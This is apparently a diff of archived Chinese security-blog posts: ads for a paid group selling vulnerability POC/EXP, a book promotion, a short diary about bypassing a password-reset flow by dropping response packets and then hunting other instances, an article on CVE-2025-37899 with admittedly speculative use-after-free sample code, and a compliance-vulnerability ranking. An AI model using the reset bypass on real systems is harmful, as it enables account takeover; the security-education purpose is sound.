新人优惠卷20扫码或者私信我即可领取
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWUMULI8zm64NrH1pNBpf6yJHePfxfpEBEibsuTPjTxtvvTaS1M05C10sGweR6sKjhnt9amVS3aPicGQ/640?wx_fmt=png&from=appmsg "")
欢迎加入星球一起交流券后价仅45元 即将满800人涨价
长期
更新更多的0day/1day漏洞POC/EXP
**内部知识库--**
**(持续更新中)**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWUw2r3biacicUOicXUZHWj2FgFu12KTxgSfI69k7BChztff43VObUMsvvLyqsCRYoQnRKg1ibD7A0U3bQ/640?wx_fmt=png&from=appmsg "")
**知识库部分大纲目录如下:**
知识库跟
知识星球联动,基本上每天保持
更新,满足圈友的需求
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWUw2r3biacicUOicXUZHWj2FgFhXF33IuCNWh4QOXjMyjshticibyeTV3ZmhJeGias5J14egV36UGXvwGSA/640?wx_fmt=png&from=appmsg "")
知识库和知识星球有师傅们关注的
EDUSRC
CNVD相关内容内部资料
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWUw2r3biacicUOicXUZHWj2FgFKDNucibvibBty5UMNwpjeq1ToHpicPxpNwvRNj3JzWlz4QT1kbFqEdnaA/640?wx_fmt=png&from=appmsg "")
还有网上流出来的各种
SRC/CTF等课程视频
量大管饱,扫描下面的知识星球二维码加入即可
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWUw2r3biacicUOicXUZHWj2FgFxYMxoc1ViciafayxiaK0Z26g1kfbVDybCO8R88lqYQvOiaFgQ8fjOJEjxA/640?wx_fmt=png&from=appmsg "")
不会挖CNVD不会挖EDURC不会挖企业SRC不会打nday和通杀漏洞
直接加入我们小圈子:
知识星球+内部圈子交流群+知识库
快来吧!!
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWUMULI8zm64NrH1pNBpf6yJ5wUOL9GnsxoXibKezHTjL6Yvuw6y8nm5ibyL388DdDFvuAtGypahRevg/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1 "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/b7iaH1LtiaKWUMULI8zm64NrH1pNBpf6yJO0FHgdr6ach2iaibDRwicrB3Ct1WWhg9PA0fPw2J1icGjQgKENYDozpVJg/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1 "")
内部小圈子——
圈友反馈
良心价格
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWW0s5638ehXF2YQEqibt8Hviaqs0Uv6F4NTNkTKDictgOV445RLkia2rFg6s6eYTSaDunVaRF41qBibY1A/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWW0s5638ehXF2YQEqibt8HviaRhLXFayW3gyfu2eQDCicyctmplJfuMicVibquicNB3Bjdt0Ukhp8ib1G5aQ/640?wx_fmt=png&from=appmsg "")
****
**神农安全公开交流群**
有需要的师傅们直接扫描文章二维码加入,然后要是后面群聊二维码扫描加入不了的师傅们,直接扫描文章开头的二维码加我(备注加群)
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsfqLqZALjB7VA4jWPQhoFxtFNbpjlAjz8MwH3rtbHtoEoW8qPjqjOTA/640?wx_fmt=jpeg&from=appmsg "")
****
  
```
```
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/b7iaH1LtiaKWW8vxK39q53Q3oictKW3VAXz4Qht144X0wjJcOMqPwhnh3ptlbTtxDvNMF8NJA6XbDcljZBsibalsVQ/640?wx_fmt=gif "")

View File

@ -1,5 +1,10 @@
# 当漏洞成为“数字战争”的弹药,谁能改写攻防规则?
鼎新安全 2025-05-21 05:15
CKCsec安全研究院 2025-05-27 01:00
![图片](https://mmbiz.qpic.cn/sz_mmbiz_gif/iaibvmyz4605OWlUh6bZx79ugMpDVGYEp3wDOaKj5EpU4P0n1ZFQgTxJzmfqf0jQn2W7k4E39icj4LTdSYTJfpAgA/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1 "")
关注我们丨文末赠书
在虚拟与现实交织的数字战场,一次协议漏洞的触发,可能会让银行系统沦陷、电网瘫痪、国家机密泄露;而一个顶尖漏洞猎人的发现,却能让攻击链在萌芽时被斩断,让亿万用户免于暴露在暗处的屠刀之下。
@ -29,7 +34,7 @@ Part.1
全球安全会议BlackHat/CanSecWest的“漏洞魔术师”每次分享都引发行业地震。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34Yt8ib0SrHNeQB5KVE2De4JhVZd2or0RlxuCr8zdZXKz0dictuw05MclA/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34Yt8ib0SrHNeQB5KVE2De4JhVZd2or0RlxuCr8zdZXKz0dictuw05MclA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
▲詹姆斯·福肖James Forshaw
@ -44,16 +49,14 @@ Part.1
**《攻击网络协议:协议漏洞的发现+利用+保护》**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34icVgGH3jKeAice71ILp63wPkHdArP6MgyOxiciaKS9jELvXktFrEv5DzicQ/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34icVgGH3jKeAice71ILp63wPkHdArP6MgyOxiciaKS9jELvXktFrEv5DzicQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34jIl8EhiakvRJW2kt5W8DJfibQQ2LpDLUf0VUyichce8r1KJreFRlVeibZQ/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34jIl8EhiakvRJW2kt5W8DJfibQQ2LpDLUf0VUyichce8r1KJreFRlVeibZQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
点击下方,即可购书
Part.2
@ -64,9 +67,9 @@ Part.2
**James Forshaw**
亲授实战经验当BlackHat、CanSecWest等顶级安全会议的常客将十余年攻防精髓倾囊相授这本书便注定不是一本普通的技术指南——它是网络安全从业者从“脚本小子”蜕变为“漏洞猎人”的必修课更是开发者构建安全防线的终极指南。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34awc5s6aibGSib7noP1onXicBf0bGlpTzXG4C4aEesuKT7Nl0iblib6UW1RA/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34awc5s6aibGSib7noP1onXicBf0bGlpTzXG4C4aEesuKT7Nl0iblib6UW1RA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34mdiaibpWym1wiaHAFB29KIfo5aFelLlpEPoWPNagEgRtnBMib7lB9JD1GQ/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34mdiaibpWym1wiaHAFB29KIfo5aFelLlpEPoWPNagEgRtnBMib7lB9JD1GQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
Part.3
@ -81,23 +84,23 @@ Part.3
**基础筑基**
——拆解TCP/IP、HTTP/2等协议的底层逻辑结合Wireshark流量捕获与Kali Linux数据包篡改夯实协议级分析能力。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34gJESZ0ZDMTDXnyPwvEiaUicPsWaXUb0tG6Wu7EByUBIUE3DAcIOjIdUA/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34gJESZ0ZDMTDXnyPwvEiaUicPsWaXUb0tG6Wu7EByUBIUE3DAcIOjIdUA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34xa57asEa1kfg36ibGWBreLj9jcud5s6df0N6QMliaxvIyykpwqNyRwMw/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34xa57asEa1kfg36ibGWBreLj9jcud5s6df0N6QMliaxvIyykpwqNyRwMw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
**协议解剖**
——深入解析二进制与文本协议的结构,包括数值型数据、布尔值、日期时间、长度可变数据等的表示方法。通过实例学习如何识别协议中的长度字段、校验和等关键元素。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34aWyuMqKp0z5hJvnxIWm4zntgVuXedeJXyA8yX7PicMztIv7wqdXG0qA/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34aWyuMqKp0z5hJvnxIWm4zntgVuXedeJXyA8yX7PicMztIv7wqdXG0qA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib348j72v4tWRwyUe53o7RETfryXSm7fQ0s3z7HxCvZ8Q43yZBs6qRJYug/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib348j72v4tWRwyUe53o7RETfryXSm7fQ0s3z7HxCvZ8Q43yZBs6qRJYug/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
**漏洞狩猎**
——详细讲解缓冲区溢出、释放后重用等内存损坏漏洞的原理与利用方法,通过模糊测试工具和调试技术定位并利用这些漏洞。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34uDHianqFkx8rbT5TPxwGpRx0gKic7v75LtMM0w7WNR707n0pHGzrITrg/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34uDHianqFkx8rbT5TPxwGpRx0gKic7v75LtMM0w7WNR707n0pHGzrITrg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34bz2A7Mnhziaqa9Gf2FawAyh4Yldibjm6wSKDL9dFLJwb8kjBuia78tOmA/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34bz2A7Mnhziaqa9Gf2FawAyh4Yldibjm6wSKDL9dFLJwb8kjBuia78tOmA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
Part.4
@ -115,11 +118,11 @@ Part.4
**大量真实且经典的漏洞案例**
为依托,通过代码示例逐步拆解漏洞利用过程,从漏洞触发条件的分析、利用代码的编写思路,到最终实现攻击效果的代码实现。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34pZAPSicZjzXSicx3MPcSWyjo7yBqGEh1xNiaibIdVrwte0uVQ8xAPx3zHg/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34pZAPSicZjzXSicx3MPcSWyjo7yBqGEh1xNiaibIdVrwte0uVQ8xAPx3zHg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib3462rvsGaaQNnKVAKniaMUImhFialUAibjicrhDduia71VFeQ6YAOK8WmsCPA/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib3462rvsGaaQNnKVAKniaMUImhFialUAibjicrhDduia71VFeQ6YAOK8WmsCPA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34QqnDfbpiaQAeUHxKWbWOceYicUyMrnkZfDvNkyhygD03rDnmayzDRwmg/640?wx_fmt=png "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605PRAkMicCkpDxUmG1NtOZib34QqnDfbpiaQAeUHxKWbWOceYicUyMrnkZfDvNkyhygD03rDnmayzDRwmg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
Part.5
@ -163,6 +166,24 @@ Part.6
立即点击购买,开启你的安全网络世界!
                                      —END—
原创
初审:孙喆思
复审:栾传龙 
终审:孙英
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605OWlUh6bZx79ugMpDVGYEp3HeB2x7FacSlbjpDSkqk6PkCU08CYrWtyia2zaaI35IbWbFLaMf9vEuQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1 "")
**参与文末抽奖我们将选3名读者获得赠书1本截止时间2025年5月28日1200。**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/05AlicrBviacUrkMw5JmEC8aiaZnO8ZMhVxE17OHAJtaQL7HOskIvQ2ibPvkZuquxf0DGevxxpOKjpaQCeDjy3L3RQ/640?wx_fmt=jpeg&from=appmsg "")
**—END—**

View File

@ -0,0 +1,101 @@
# 挖洞日记 | 记一次轻松拿下统一小通杀漏洞
原创 zkaq-XCKKW 掌控安全EDU 2025-05-27 04:02
 
扫码领资料
获网安教程
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcrpvQG1VKMy1AQ1oVvUSeZYhLRYCeiaa3KSFkibg5xRjLlkwfIe7loMVfGuINInDQTVa4BibicW0iaTsKw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/b96CibCt70iaaJcib7FH02wTKvoHALAMw4fchVnBLMw4kTQ7B9oUy0RGfiacu34QEZgDpfia0sVmWrHcDZCV1Na5wDQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
# 本文由掌控安全学院 -  XCKKW 投稿
**来****Track安全社区投稿~**
**千元稿费!还有保底奖励~ https://bbs.zkaq.cn**
无意间收集到一套小通用系统
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcr6RkzC3C52rJCuCDq72ibqDxibWFtAgxtNXIu4OjeZrrapd47eM8LXbq4hiaNECex6kSgGIrRCwXaBw/640?wx_fmt=png&from=appmsg "")
收集好学号姓名,填写姓名后
点击忘记密码
将回答问题的 三个包
直接删除前面两个问题的返回包到第三步
然后:球的麻袋 (稍等),就到了重置密码步骤
![img](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcr6RkzC3C52rJCuCDq72ibqDc2EZDFzL2Ocg4Nx2HadxHSqjl8APcUQvH8LvoqXYRHS14on60dXcaQ/640?wx_fmt=png&from=appmsg "null")
没想到直接 200 成功了
![img](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcr6RkzC3C52rJCuCDq72ibqDkRMU24B9v9Fphg8dnNCSK4TqMk30dbrTp1NBsibsKgwG9Dyoaiapmvug/640?wx_fmt=png&from=appmsg "null")
提取指纹,资产测绘,然后就是快乐上分了
![img](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcr6RkzC3C52rJCuCDq72ibqDNNBsQlpxbfsOibia7UN7vZyUhHSgeicYYMv1Odj5bNcrHpj9C5ffqQP8Q/640?wx_fmt=png&from=appmsg "null")
 
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
![图片](https://mmbiz.qpic.cn/mmbiz_gif/BwqHlJ29vcqJvF3Qicdr3GR5xnNYic4wHWaCD3pqD9SSJ3YMhuahjm3anU6mlEJaepA8qOwm3C4GVIETQZT6uHGQ/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")
**没看够~?欢迎关注!**
**分享本文到朋友圈,可以凭截图找老师领取**
上千**教程+工具+交流群+靶场账号**
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcrpvQG1VKMy1AQ1oVvUSeZYhLRYCeiaa3KSFkibg5xRjLlkwfIe7loMVfGuINInDQTVa4BibicW0iaTsKw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
******分享后扫码加我!**
**回顾往期内容**
[零基础学黑客,该怎么学?](http://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247487576&idx=1&sn=3852f2221f6d1a492b94939f5f398034&chksm=fa686929cd1fe03fcb6d14a5a9d86c2ed750b3617bd55ad73134bd6d1397cc3ccf4a1b822bd4&scene=21#wechat_redirect)
[网络安全人员必考的几本证书!](http://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247520349&idx=1&sn=41b1bcd357e4178ba478e164ae531626&chksm=fa6be92ccd1c603af2d9100348600db5ed5a2284e82fd2b370e00b1138731b3cac5f83a3a542&scene=21#wechat_redirect)
[文库内网神器cs4.0使用说明书](http://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247519540&idx=1&sn=e8246a12895a32b4fc2909a0874faac2&chksm=fa6bf445cd1c7d53a207200289fe15a8518cd1eb0cc18535222ea01ac51c3e22706f63f20251&scene=21#wechat_redirect)
[重生HW之感谢客服小姐姐带我进入内网遨游](https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247549901&idx=1&sn=f7c9c17858ce86edf5679149cce9ae9a&scene=21#wechat_redirect)
[手把手教你CNVD漏洞挖掘 + 资产收集](https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247542576&idx=1&sn=d9f419d7a632390d52591ec0a5f4ba01&token=74838194&lang=zh_CN&scene=21#wechat_redirect)
[【精选】SRC快速入门+上分小秘籍+实战指南](http://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247512593&idx=1&sn=24c8e51745added4f81aa1e337fc8a1a&chksm=fa6bcb60cd1c4276d9d21ebaa7cb4c0c8c562e54fe8742c87e62343c00a1283c9eb3ea1c67dc&scene=21#wechat_redirect)
##     代理池工具撰写 | 只有无尽的跳转没有封禁的IP
![图片](https://mmbiz.qpic.cn/mmbiz_gif/BwqHlJ29vcqJvF3Qicdr3GR5xnNYic4wHWaCD3pqD9SSJ3YMhuahjm3anU6mlEJaepA8qOwm3C4GVIETQZT6uHGQ/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")
点赞+在看支持一下吧~感谢看官老爷~ 
你的点赞是我更新的动力

View File

@ -0,0 +1,61 @@
# 漏洞挖掘必备利器推荐
Flag 网络安全实验室 2025-05-27 00:47
![](https://mmbiz.qpic.cn/mmbiz_gif/BSCWGKoGibicQqQMTyjnicFjCia9YMkHJRIC1ibOD4PfiahM3MiaKn8StibHq0furcHluYNFBYAqrUarmB9ZysgAoIM8JQ/640?wx_fmt=gif "")
![](https://mmbiz.qpic.cn/mmbiz_gif/dleU3icGE4HiaFHOiaDmlLaNBpiadM7SUM0g0alQpGS1Hw30Ws9vWHhrgPhEZv8TH0jIJH2uB0J8qeGicNCgBN8hKLg/640?wx_fmt=gif "")
推荐以下几个公众号不仅内容丰富而且干货满满长期更新高质量文章涉及红蓝对抗、内外网渗透、代码审计、SRC赏金、APP 安全测试、应急响应、漏洞挖掘、常用安全工具等,你想要的内容这里都有!以下排名不分先后顺序。
## 菜鸟学信安
web安全入门、进阶技巧红蓝攻防、应急响应、内网渗透、漏洞分析等技术文章分享以及网络安全工具、视频教程及学习资料。
## 渗透Xiao白帽
热衷于研究安全攻防本着“相互学习共同进步”的原则。致力于分享内网渗透、远控免杀、APP安全测试和常用安全工具类的技术分享包括分享一些奇淫巧技的思路
## 迪哥讲事
专注于赏金猎人平台,分享最新漏洞挖掘的知识,带你一起打猎
## 银遁安全团队
网安吃瓜哪家强?欢迎关注,不定时分享网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享,一起来玩儿啊~
## 泷羽Sec
从零开始学网安,专注于网络安全领域的创作与分享,包括且不限于渗透测试,内网渗透,免杀,红蓝攻防,安全工具分享等,为网络安全而战。
## Z2O安全攻防
From Zero To One. 致力于红蓝对抗、实战攻防、SRC赏金 涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全等各个方向。
夜组安全
"恐惧就是貌似真实的伪证" NightCrawler Team(简称:夜组)主攻WEB安全 | 内网渗透 | 红蓝对抗 | 代码审计 | APT攻击致力于将每一位藏在暗处的白帽子聚集在一起在夜空中划出一道绚丽的光线
## 网络安全实验室
专注于网络安全领域包括安全岗位招聘、红蓝队建设、实战攻防、内网渗透、社工、CTF比赛、安全技术分享等。

View File

@ -1,5 +1,5 @@
# 白盒Sign加密到前台SQL注入漏洞
原创 知名小朋友 进击安全 2025-05-26 13:33
sec0nd安全 2025-05-27 00:46
**免责申明**

View File

@ -0,0 +1,127 @@
# 研究者利用OpenAI o3模型发现Linux内核远程零日漏洞
原创 JunYi 毅心安全 2025-05-27 07:42
 
# 研究者利用OpenAI o3模型发现Linux内核远程零日漏洞
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/kzkqdAEDfXdxianJtPUA7bFKbTTibteIg4C1ibuMp9srJSnIDmiaTq0GgNK0wW63Qshl67Lkw8ia6tz6bPWrwGCHInQ/640?wx_fmt=jpeg&from=appmsg "")
### 文章背景
文章的主角是 Sean Heelan一位资深安全研究员他在审计 Linux 内核的 SMB 实现 ksmbd
 时,利用 OpenAI 最新推出的 o3 模型,成功发现了一个远程零日漏洞 CVE-2025-37899。ksmbd
 是 Linux 内核中用于实现 SMBServer Message Block协议的模块主要用于文件共享服务。由于 SMB 协议广泛应用于企业环境中,这个漏洞的发现具有重要意义。
### 漏洞概览CVE-2025-37899
### 漏洞类型
CVE-2025-37899 是一个 use-after-freeUAF使用后释放 漏洞位于 ksmbd
  logoff
 命令处理程序 中。
UAF 漏洞定义:当一个内存对象被释放后,程序仍然尝试访问或操作该内存地址时,就会触发 UAF 漏洞。这种情况可能导致未定义行为,包括程序崩溃甚至远程代码执行。
### 漏洞位置
漏洞出现在 ksmbd
 处理 SMB 协议的 logoff
 命令时。logoff 命令通常由客户端发送,用于通知服务器断开当前会话。
## 漏洞细节分析
### 成因分析
漏洞的核心问题是 引用计数管理不当,结合 SMB 服务器的并发连接特性,导致了 UAF 的发生。以下是具体成因:
### 1、对象释放
在处理 logoff
 命令时ksmbd
 会释放某个关键对象(例如会话或连接相关的结构体)。这个对象在释放后,其内存地址应该被标记为不可用。
### 2、并发访问
SMB 服务器支持多线程处理并发连接。当一个线程释放了该对象后,另一个线程可能仍在处理与该对象相关的操作,并尝试访问已被释放的内存。
### 3、引用计数缺失
该对象没有正确实现引用计数机制。正常情况下引用计数用于跟踪对象的活跃引用数只有当计数为零时对象才会被安全释放。但在 ksmbd
 中,设计缺陷导致对象在仍有线程引用时就被提前释放。
### 推测的代码问题
文章中未直接提供漏洞的代码片段,但根据描述,我推测问题可能出现在类似以下的逻辑中(伪代码表示):
```
struct session {
    int ref_count; // 引用计数    void *data;    // 数据指针};
void process_logoff(struct session *s) {    free(s->data); // 释放数据    free(s);       // 释放会话对象}void handle_connection(struct session *s) {    // 假设另一个线程仍在使用 s->data    process_data(s->data);}
```
在上述伪代码中:
process_logoff 函数释放了 s->data 和 s但没有检查 ref_count 是否为零。
如果 handle_connection 在并发线程中仍在访问 s->data就会触发 UAF。
## 漏洞利用方式
文章未详细披露具体的利用方法,但基于 UAF 漏洞的特性,我可以推测一个可能的利用路径:
### 1、触发对象释放
攻击者通过发送精心构造的 logoff
 命令,触发目标对象的释放。
### 2、并发访问
在对象释放后,攻击者立即通过另一个 SMB 连接访问同一对象。此时,内存可能仍未被覆盖,指向已被释放的地址。
### 3、内存重用与控制
- • 被释放的内存可能被操作系统重新分配给其他用途。
- • 攻击者通过发送特定的 SMB 请求,控制重新分配的内存内容(例如堆喷射技术),从而覆盖关键数据(如函数指针)。
- • 如果成功控制内存布局,可能实现任意代码执行。
### 利用难度
挑战:利用 UAF 需要精确控制内存分配和线程时序,属于高难度利用。
可能性由于 ksmbd
 运行在内核态,成功利用可能导致远程提权或系统崩溃。
## 漏洞发现方法
### 使用 OpenAI o3 模型
Sean Heelan 使用了 OpenAI 的 o3 模型这是一个强大的大型语言模型LLM具备理解和分析代码的能力。发现过程如下
### 1、代码输入
作者将 ksmbd
 的相关代码(约 12,000 行)输入到 o3 模型中。这包括 logoff 命令处理程序及相关并发逻辑。
### 2、模型分析
o3 模型通过静态分析和语义理解,识别出潜在的漏洞点。特别地,它能够:
理解并发连接的复杂性。
检测未正确管理引用计数的对象。
### 3、结果验证
作者运行 o3 模型 100 次,其中 1 次成功发现了 CVE-2025-37899。虽然成功率仅 1%,但这表明 o3 在漏洞挖掘中的潜力。
### 其他发现
在分析过程中o3 模型还重新发现了作者之前手动找到的漏洞 CVE-2025-37778Kerberos 认证路径中的 UAF 漏洞),进一步验证了模型的有效性。
### 代码示例
由于文章未提供具体代码,我根据描述构造了一个可能的漏洞场景,供读者参考:
```
#include <stdlib.h>
#include <pthread.h>
struct smb_session {    int active;     // 会话状态    char *buffer;   // 数据缓冲区};void *process_logoff(void *arg) {    struct smb_session *s = (struct smb_session *)arg;    free(s->buffer);  // 释放缓冲区    free(s);          // 释放会话对象    return NULL;}void *handle_request(void *arg) {    struct smb_session *s = (struct smb_session *)arg;    if (s->buffer) {  // 可能访问已释放的内存        s->buffer[0] = 'A';    }    return NULL;}int main() {    struct smb_session *session = malloc(sizeof(struct smb_session));    session->buffer = malloc(100);    session->active = 1;    pthread_t t1, t2;    pthread_create(&t1, NULL, process_logoff, session);    pthread_create(&t2, NULL, handle_request, session);    pthread_join(t1, NULL);    pthread_join(t2, NULL);    return 0;}
```
### 代码说明
process_logoff 线程释放 session 和 buffer。
handle_request 线程可能在释放后访问 buffer触发 UAF。
缺少同步机制(如锁或引用计数)是漏洞的关键。
## 总结与思考
### 漏洞意义
CVE-2025-37899 展示了 Linux 内核 SMB 实现中的潜在风险,尤其是在并发场景下。作为一个远程零日漏洞,它可能被恶意利用来攻击支持 SMB 的 Linux 服务器。
### o3 模型的潜力
OpenAI 的 o3 模型在漏洞发现中的应用令人振奋。尽管当前成功率较低,但其理解复杂代码和并发逻辑的能力,预示着 AI 在安全研究中的广阔前景。未来随着模型优化AI 辅助漏洞挖掘可能成为主流。
### 安全建议
开发者
:在 ksmbd 中引入引用计数或锁机制,确保对象生命周期安全。用户
:及时更新 Linux 内核,应用针对 CVE-2025-37899 的补丁。
这篇文章不仅是一次技术突破的记录,也是 AI 与安全研究结合的里程碑。期待更多类似的创新案例!
 

View File

@ -0,0 +1,215 @@
# 等保测评10大高频漏洞谁将SQL注入挤下神坛
原创 牛叫瘦 HACK之道 2025-05-27 00:23
 
在网络安全领域SQL注入曾长期占据漏洞威胁榜首但2025年最新等保测评数据显示这一传统认知正被颠覆。本文基于近三年等保测评机构公开数据结合200+真实案例调研,揭示当前等保测评中十大高频漏洞的实战排名与应对策略。
## 一、等保测评漏洞评估新趋势
根据公安部2025版《网络安全等级保护测评指南》漏洞评估从“单点扣分制”升级为“系统风险量化模型”。新版标准强调三个核心转变
1. 1. **风险叠加计算**
中低风险漏洞的叠加效应被纳入评估体系如3个中危漏洞可能触发高危判定
1. 2. **场景化威胁分析**
同一漏洞在不同业务场景的威胁值差异可达300%(如数据库管理后台的弱口令风险高于普通用户系统)
1. 3. **动态防护能力评估**
漏洞修复时效性纳入评分超过72小时未处置的高危漏洞将触发“系统性防护失效”标记
## 二、2025等保测评十大高频漏洞排行榜
### TOP1 身份鉴别漏洞
**典型案例**
某省级政务系统因未启用双因素认证测评人员通过暴力破解工具在4分37秒内获取管理员权限
**核心问题**
- • 静态口令复杂度不足(仍有系统使用"Admin@123"类通用密码)
- • 认证失败处理机制缺失系统未配置5次错误锁定策略
**技术方案**
- • 实施RBAC动态权限体系关键操作需生物特征+动态令牌双因子验证
- • 部署自适应认证引擎根据登录IP、设备指纹实时调整认证强度
### TOP2 日志审计缺陷
**致命案例**
某三甲医院HIS系统因日志保留周期不足仅7天导致医疗数据篡改事件无法追溯直接评定为等保三级不合格
**典型缺陷**
- • 日志字段缺失操作时间戳、源IP等关键字段未记录
- • 存储安全不足56%系统采用明文存储审计日志)
**解决方案**
- • 构建ELK+区块链日志存证体系,确保日志完整性可验证
- • 部署智能日志分析平台,实现异常操作秒级告警
### TOP3 访问控制失效
**高危场景**
某电商平台因URL参数校验缺失攻击者通过修改order_id参数越权查看百万级用户订单
